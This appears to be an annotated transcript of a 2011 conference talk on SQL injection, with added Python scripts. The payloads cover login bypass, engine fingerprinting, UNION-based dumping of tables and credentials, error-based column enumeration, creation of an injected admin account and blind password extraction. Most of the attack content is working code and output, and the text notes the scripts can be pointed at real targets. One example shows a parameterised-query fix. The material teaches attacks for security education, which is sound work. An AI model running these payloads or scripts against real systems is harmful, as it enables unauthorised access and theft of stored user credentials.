How Did I Steal Your Database
Mostafa Siraj, Application Security Expert
DISCLAIMER: Hacking websites is ILLEGAL. This presentation is meant for educational purposes ONLY. Only use this stuff on YOUR website and YOUR account.
Nearly all applications rely on a datastore.
What is a database? A collection of tables (Users, Orders, Countries, etc.); each table is a collection of columns and rows.
What is SQL? A query language for interacting with the database. SQL can retrieve data from the database, insert new records, delete records and update records.
SQL Queries. To get all data about the username elprince:
SELECT Username, Password, First_Name, Last_Name FROM Users WHERE Username='elprince'
which returns that user's row (the result table is shown on the slide).
FACT: amongst Codd's rules for a relational database, metadata must be stored in the database just as regular data is. This is what makes the later steps work: table and column names are themselves rows in tables (information_schema in MySQL, the system catalogs in SQL Server), so the same injection that reads user data can read the schema.
SQL Injection is a technique where an attacker creates or alters existing SQL commands to:
- expose hidden data (e.g. steal all the records from the tables)
- override data (e.g. the administrator's password)
- execute dangerous system-level commands on the database host
SQL Injection Login Example. The application builds:
SELECT * FROM Users WHERE Username='username' AND Password='password'
If the user enters Elprince and Elprince123, the query becomes:
SELECT * FROM Users WHERE Username='Elprince' AND Password='Elprince123'
SQL Injection Example (cont.). Suppose the user enters ' OR 1=1-- as the username and 123 as the password. The query becomes:
SELECT * FROM Users WHERE Username='' OR 1=1--' AND Password='123'
-- comments out everything after it, so what actually runs is:
SELECT * FROM Users WHERE Username='' OR 1=1
which matches every row; the application logs the attacker in as whichever row comes back first.
This is not enough. You can enhance the injection to log in with the administrator account: enter ' OR 1=1 ORDER BY 1-- as the username and abc as the password, and the query becomes:
SELECT * FROM Users WHERE Username='' OR 1=1 ORDER BY 1--' AND Password='abc'
ORDER BY 1 sorts the rows by the first column of the SELECT list (typically the id), so the first account created, which is usually the administrator, comes first. If it does not, try other column numbers or add DESC.
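The login bypass above, as an added example that is not part of the original deck: a constructed SQLite database stands in for the application's Users table (table name, column names and the three accounts are assumptions), the vulnerable function concatenates the input exactly as the slide shows, and the fixed function binds the same input as parameters so it can never change the query's structure.

```python
import sqlite3

# Constructed demo database: a Users table like the one on the slides. The
# administrator was created after the other accounts, so it is not the first row.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Users (id INTEGER PRIMARY KEY, Username TEXT, Password TEXT);
        INSERT INTO Users VALUES (1, 'elprince', 'Elprince123');
        INSERT INTO Users VALUES (2, 'bob', 'hunter2');
        INSERT INTO Users VALUES (3, 'Administrator', 's3cret');
    """)
    return db

def login_vulnerable(db, username, password):
    """Builds the query by string concatenation, the pattern shown on the slide.
    Returns the username of the first matching row, which is whom the
    application would log the visitor in as."""
    sql = ("SELECT Username FROM Users WHERE Username='" + username
           + "' AND Password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(db, username, password):
    """The same check with bind parameters: the input is passed as data, so a
    quote in it can never change the query's structure."""
    row = db.execute(
        "SELECT Username FROM Users WHERE Username=? AND Password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

def demo():
    db = make_db()
    return {
        # legitimate login
        "normal": login_vulnerable(db, "elprince", "Elprince123"),
        # ' OR 1=1-- makes the WHERE clause true for every row; the first row
        # in table order (elprince) is returned, so that is who we become
        "bypass": login_vulnerable(db, "' OR 1=1--", "123"),
        # ORDER BY 1 sorts by the first column of the SELECT list (Username
        # here, the id on the slide), which moves 'Administrator' to the front
        "admin": login_vulnerable(db, "' OR 1=1 ORDER BY 1--", "abc"),
        # the parameterised version looks for a user literally named "' OR 1=1--"
        "fixed": login_fixed(db, "' OR 1=1--", "123"),
    }

if __name__ == "__main__":
    for name, user in demo().items():
        print(f"{name:7s} -> {user}")
```

The bypass returns elprince rather than the administrator only because of table order; the ORDER BY variant shows how the attacker takes control of that order, and the parameterised query shows that the defence is structural, not a filter on quote characters.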
Finding SQL Injection Bugs
- Submit a single quotation mark (') and observe the result.
- Submit two single quotation marks ('') and observe the result. A single quote that breaks the query while '' (an escaped quote) does not is a strong sign of injection.
- For multi-stage processes, complete all the stages before observing the results.
- For search fields, try the wildcard character %.
- For numeric data, if the original value was 2, try submitting 1+1 or 3-1. If that works, try SQL-specific functions, e.g. 67-ASCII('A') [ASCII('A')=65]. If single quotes are filtered, try 51-ASCII(1) [note ASCII(1)=49, because the number 1 is converted to the string '1' first].
Identify the database engine
- The error messages will often name the DB engine.
- Guess the DB from the OS or web server (e.g. LAMP: Linux + Apache + MySQL + PHP).
- Use engine-specific characters or commands. String concatenation differs between engines:
  Oracle: '||'FOO (PostgreSQL uses || as well)
  SQL Server: '+'FOO
  MySQL: ' 'FOO [note the space between the two quotes]
Identify user privileges (SQL Server syntax):
' and 1 in (SELECT user)-- (the type-conversion error message leaks the current user name)
'; IF user='admin' WAITFOR DELAY '0:0:10'-- (no error needed: a 10-second delay answers the question)
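The detection and fingerprinting probes from the last three slides (quote test, arithmetic in numeric parameters, concatenation operator), as an added example that is not part of the original deck. The target is a constructed SQLite product search; SQLite accepts only || for concatenation, so the fingerprint lands in the Oracle/PostgreSQL family, and unicode('A') is SQLite's spelling of the slide's ASCII('A'). The product names and the two endpoints are assumptions.

```python
import sqlite3

# Constructed demo target: a product search and a product-by-id page, both
# building their SQL by string concatenation.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
    INSERT INTO products VALUES (1, 'Water bottle'), (2, 'Coffee mug'), (3, 'Tea pot');
""")

def search(term):
    """The vulnerable search field (returns matching product names)."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [r[0] for r in db.execute(sql)]

def lookup(product_id):
    """The vulnerable numeric parameter (product page by id, spliced in unquoted)."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def quiet(fn, arg):
    """Run one probe and return (result, error_text)."""
    try:
        return fn(arg), None
    except sqlite3.Error as e:
        return None, str(e)

def quote_probe(search_fn):
    """' should break the query while '' (an escaped quote) should not."""
    _, err_one = quiet(search_fn, "'")
    _, err_two = quiet(search_fn, "''")
    return err_one is not None and err_two is None

def numeric_probe(lookup_fn, original="2"):
    """If 1+1, 3-1 and 67-unicode('A') all return the same page as 2, the
    server is evaluating our arithmetic, i.e. the value is inside the SQL."""
    base, _ = quiet(lookup_fn, original)
    probes = ["1+1", "3-1", "67-unicode('A')"]
    return base is not None and all(quiet(lookup_fn, p)[0] == base for p in probes)

# Concatenation operator accepted by each engine family (from the slides).
CONCAT_PROBES = {
    "||": ("Wa'||'ter", "Oracle / PostgreSQL / SQLite"),
    "+": ("Wa'+'ter", "Microsoft SQL Server"),
    " ": ("Wa' 'ter", "MySQL"),
}

def fingerprint(search_fn):
    """Split a known-good search term with each operator; the family whose
    operator rebuilds the original term (same results, no error) is the engine."""
    baseline, _ = quiet(search_fn, "Water")
    hits = []
    for op, (payload, engine) in CONCAT_PROBES.items():
        result, err = quiet(search_fn, payload)
        if err is None and baseline and result == baseline:
            hits.append((op, engine))
    return hits

def run_probes():
    return {
        "quote_breaks_query": quote_probe(search),
        "arithmetic_evaluated": numeric_probe(lookup),
        "concat": fingerprint(search),
    }

if __name__ == "__main__":
    print(run_probes())
```

Comparing against a baseline response, rather than just looking for "no error", is what makes the concatenation probe reliable: on SQLite the + variant does not error either, it silently evaluates to 0 and matches nothing, and only the result comparison rules it out.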
Injection in Search Fields
Entering normal input gives the normal search results.
Trying a single quote: I receive an error, and the error states that it's MySQL.
Suppose I still don't know the DB engine. Is it SQL Server? Note: string concatenation in SQL Server is +. I get an error, so it's not SQL Server.
Is it Oracle? Note: string concatenation in Oracle is ||. A different error, so still not Oracle.
Is it MySQL? Note: string concatenation in MySQL is a blank space. It's MySQL.
The query in the backend is something like:
SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….
with my input landing somewhere in that WHERE clause (the LIKE is a possible location).
The Strategy
1. Get the number of items after the SELECT statement (how many columns are there?)
2. Identify the location of the STRINGS in the SELECT statement (which of those columns are strings?)
3. Get the structure of the database:
SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
4. Get the data from the database:
SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
1. Get the number of items after the SELECT statement
A column number that is too large gives an error. Try another number: a result, but why are there fewer results than before? Try another number: error, so it's not 8. Let's try 7: a result. How many columns do we have in the SELECT statement? Seven.
2. Identify the location of the STRINGS in the SELECT statement
1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Result: the query runs, so seven NULLs match the seven columns and the injection point sits inside a quoted value in parentheses (# comments out the rest of the query in MySQL).
Get the strings and their locations:
1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
Result: the markers that appear in the page show which columns accept strings and where each one is displayed.
3. Get the structure of the database
1234') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL FROM information_schema.tables#
Result: the table names are listed in the fourth (string) column of the search results.
4. Get the data from the database. Next queries:
1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='USERS'#
1234') UNION SELECT NULL,NULL,NULL,username,password,NULL,NULL FROM users WHERE id<100#
… Continue until you have all the tables. (Table names are case-sensitive in MySQL on Linux, so use the name exactly as information_schema.tables returned it.)
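The four-step UNION strategy end to end, as an added example that is not part of the original deck. A constructed SQLite database stands in for the MySQL target: the comment terminator is -- instead of the slides' #, sqlite_master replaces information_schema.tables, and the CREATE statement stored in sqlite_master replaces information_schema.columns. The 7-column products table, the users table and the page rendering only three of the seven columns are assumptions; step 1 uses ORDER BY probing, which the slides show the outcome of but not the payload.

```python
import sqlite3

# Constructed demo target: a 7-column product search whose term lands inside
# quotes and parentheses, matching the 1234') prefix used on the slides.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, category TEXT,
                           descr TEXT, vendor TEXT, price REAL, stock INTEGER);
    INSERT INTO products VALUES (1, 'Water bottle', 'outdoor', 'Steel, 1 litre', 'ACME', 9.5, 12);
    INSERT INTO products VALUES (2, 'Coffee mug', 'kitchen', 'Ceramic, 300 ml', 'ACME', 4.0, 40);
    CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 'Admin!2011');
    INSERT INTO users VALUES (2, 'elprince', 'Elprince123');
""")

def search(term):
    """Vulnerable search. The page renders only name, descr and price
    (positions 2, 4 and 6 of the SELECT list)."""
    sql = ("SELECT id,name,category,descr,vendor,price,stock FROM products "
           "WHERE (name LIKE '%" + term + "%' AND stock > 0)")
    return [(r[1], r[3], r[5]) for r in db.execute(sql)]

def errors(term):
    try:
        search(term)
        return False
    except sqlite3.Error:
        return True

# Step 1: raise ORDER BY n until the database complains; the last good n is
# the number of columns in the SELECT list.
def column_count(max_cols=20):
    n = 1
    while n <= max_cols and not errors(f"x') ORDER BY {n}--"):
        n += 1
    return n - 1

def select_list(n, at):
    """NULL in every position except those given in `at` (1-based)."""
    cols = ["NULL"] * n
    for pos, expr in at.items():
        cols[pos - 1] = expr
    return ",".join(cols)

def union(n, at, from_clause=""):
    """Send 1234') UNION SELECT ... -- and return the rows the page rendered."""
    return search(f"1234') UNION SELECT {select_list(n, at)} {from_clause}--")

# Step 2: place a marker in each position in turn; where it shows up on the
# page is where extracted strings will be readable.
def reflected_positions(n):
    return [p for p in range(1, n + 1)
            if any("ABC" in str(cell) for row in union(n, {p: "'ABC'"}) for cell in row)]

# Step 3: the schema is stored in tables too (Codd's rule), so the same UNION
# reads it: sqlite_master here, information_schema on MySQL.
def table_names(n, pos):
    rows = union(n, {pos: "name"}, "FROM sqlite_master WHERE type='table'")
    return sorted(r[0] for r in rows if r[0] is not None)

def table_ddl(n, pos, table):
    rows = union(n, {pos: "sql"}, f"FROM sqlite_master WHERE name='{table}'")
    return next(r[0] for r in rows if r[0] is not None)

# Step 4: read the data itself through two of the reflected positions.
def dump_users(n, pos_a, pos_b):
    rows = union(n, {pos_a: "username", pos_b: "password"}, "FROM users")
    return {r[0]: r[1] for r in rows if r[0] is not None}

def extract_all():
    n = column_count()
    shown = reflected_positions(n)
    return {
        "column_count": n,
        "reflected_positions": shown,
        "tables": table_names(n, shown[0]),
        "users_ddl": table_ddl(n, shown[0], "users"),
        "credentials": dump_users(n, shown[0], shown[1]),
    }

if __name__ == "__main__":
    print(extract_all())
```

The search term 1234 is chosen to match no real product, so everything the page renders after the UNION comes from the attacker's SELECT; on MySQL a string marker in a numeric column would raise an error where SQLite silently accepts it, which is why the slides use NULL placeholders first and markers second.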
Injection with SQL Server errors
A single quote gives me an error.
Getting the SQL Server version: ' and 1 in (SELECT @@version)--
The error is a type-conversion failure that quotes the full version string (SQL Server cannot convert the nvarchar @@version value to int, and the message says which value it failed on).
Getting column names: I get an error whose text names the first column of the table (login.firstname).
Getting the next column name: ' group by login.firstname having 1=1--
I get an error naming the next column.
Again: ' group by login.firstname, login.surname having 1=1--
The error reveals a new column name.
Again: ' group by login.firstname, login.surname, login.username having 1=1--
Another new column name.
Continue until every column is in the GROUP BY and the error stops.
After getting all of the columns I found a field called IsAdmin; that's my goal. Putting the following stacked query creates an admin account on the application:
'; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES ('Administrator','******',TRUE,…..)
(This needs batched statements, which SQL Server allows by default, and INSERT rights for the application's database user; in T-SQL the bit value is written as 1 rather than TRUE.)
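The error-based enumeration above, automated, as an added example that is not part of the original deck. Since SQL Server cannot be embedded here, a constructed responder plays the vulnerable page: it answers each payload with the text SQL Server would produce (the messages copy the wording of the real Msg 8118/8120 GROUP BY errors and Msg 245 conversion error) for an assumed login table whose column list is also an assumption. The attacker side parses the leaked name out of each error and builds the next GROUP BY payload, exactly the loop performed by hand on the slides.

```python
import re

# Constructed stand-in for the vulnerable ASP page: it "runs" SELECT * FROM login
# with our input spliced in and returns the SQL Server error text, or "" when
# the page renders normally. Column list and version string are assumptions.
LOGIN_COLUMNS = ["firstname", "surname", "username", "pwd", "IsAdmin"]
VERSION = "Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1"

def fake_page(payload):
    if payload == "' and 1 in (SELECT @@version)--":
        return ("Conversion failed when converting the nvarchar value "
                f"'{VERSION}' to data type int.")
    m = re.fullmatch(r"' group by (.+) having 1=1--", payload)
    if payload == "' having 1=1--" or m:
        grouped = [c.strip().split(".")[-1] for c in m.group(1).split(",")] if m else []
        for col in LOGIN_COLUMNS:
            if col not in grouped:      # SQL Server reports the first ungrouped column
                if grouped:
                    return (f"Column 'login.{col}' is invalid in the select list "
                            "because it is not contained in either an aggregate "
                            "function or the GROUP BY clause.")
                return (f"Column 'login.{col}' is invalid in the select list "
                        "because it is not contained in an aggregate function "
                        "and there is no GROUP BY clause.")
        return ""                       # every column grouped: no error, normal page
    return "Unclosed quotation mark after the character string ''."

# Attacker side: parse what each error leaks and build the next payload.
def leaked_column(error):
    m = re.search(r"Column '(?:[^'.]+\.)?([^']+)' is invalid in the select list", error)
    return m.group(1) if m else None

def leaked_value(error):
    m = re.search(r"converting the \w+ value '(.*)' to data type int", error)
    return m.group(1) if m else None

def get_version(page):
    return leaked_value(page("' and 1 in (SELECT @@version)--"))

def enumerate_columns(page, table="login", limit=50):
    """HAVING without GROUP BY makes SQL Server name the first column of the
    SELECT *; adding that column to GROUP BY makes it name the next one, and
    so on until no error comes back."""
    cols = []
    payload = "' having 1=1--"
    for _ in range(limit):
        col = leaked_column(page(payload))
        if col is None:
            break
        cols.append(col)
        payload = "' group by " + ", ".join(f"{table}.{c}" for c in cols) + " having 1=1--"
    return cols

if __name__ == "__main__":
    print(get_version(fake_page))
    print(enumerate_columns(fake_page))
```

Swapping fake_page for a function that submits the payload to the real form and returns the response body is all that is needed to run this against a target; the regexes match the SQL Server wording, so they will not fire on MySQL or Oracle errors.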
Not all injections generate errors. When the application hides errors, use blind techniques: inject a condition and compare the page for true versus false (boolean-based), or inject a conditional delay such as WAITFOR DELAY on SQL Server or SLEEP() on MySQL and measure the response time (time-based).
DEMO: sqlmap (automates the detection, fingerprinting and UNION, error-based and blind extraction shown above)
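A boolean-based blind extraction, as an added example that is not part of the original deck and that sqlmap automates for the demo. The target is a constructed SQLite endpoint that only answers yes or no to "does this username exist" and swallows every database error, so neither the UNION nor the error-based techniques apply; the attacker still recovers the administrator password one character at a time with a binary search over each character code. The users table, its single row and the endpoint are assumptions; unicode() and substr() are the SQLite spellings of ASCII() and SUBSTRING().

```python
import sqlite3

# Constructed demo target: a "username taken?" check that returns only True or
# False and hides errors, so no data or error text ever reaches the page.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 'Zx9!');
""")

def username_exists(username):
    sql = "SELECT 1 FROM users WHERE username='" + username + "'"
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

class Oracle:
    """Wraps the yes/no endpoint and counts how many requests an attack needs."""
    def __init__(self, fn):
        self.fn, self.requests = fn, 0
    def __call__(self, condition):
        self.requests += 1
        # a known-good username ANDed with our condition: True only if the
        # condition holds; -- discards the closing quote the application adds
        return self.fn(f"admin' AND ({condition})--")

def is_blind_injectable(oracle):
    """Detection without errors: 1=1 and 1=2 must produce different answers."""
    return oracle("1=1") and not oracle("1=2")

def blind_extract(oracle, subquery, max_len=64):
    """Recover the string returned by `subquery` one character at a time,
    binary searching the character code: about 7 requests per character
    instead of up to 95 for guessing each printable character in turn."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length(({subquery})) >= {pos}"):
            break                           # past the end of the value
        lo, hi = 32, 126                    # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

def demo():
    oracle = Oracle(username_exists)
    secret = "SELECT password FROM users WHERE username='admin'"
    return {
        "injectable": is_blind_injectable(oracle),
        "password": blind_extract(oracle, secret),
        "requests": oracle.requests,
    }

if __name__ == "__main__":
    print(demo())
```

For the time-based variant the oracle is the same; only the condition changes, e.g. IF (cond) WAITFOR DELAY '0:0:5' on SQL Server or AND IF(cond, SLEEP(5), 0) on MySQL, with the response time replacing the True/False page difference.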
You Were GREAT Audience
Thank You @mostafasiraj Mostafa Siraj
How Did I Steal Your Database, CSCamp 2011
Editor's Notes
The sqlmap command used in the demo (against the HacmeBank training application):
sqlmap -u "http://rajpc/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&account_no=5204320422040001" --cookie "ASP.NET_SessionId=fadqryjsmlb52y45hztq0pvc; CookieLoginAttempts=5; Admin=false" -p account_no
(-u is the target URL, --cookie carries the authenticated session so the injectable page is reachable, and -p names the parameter to test.)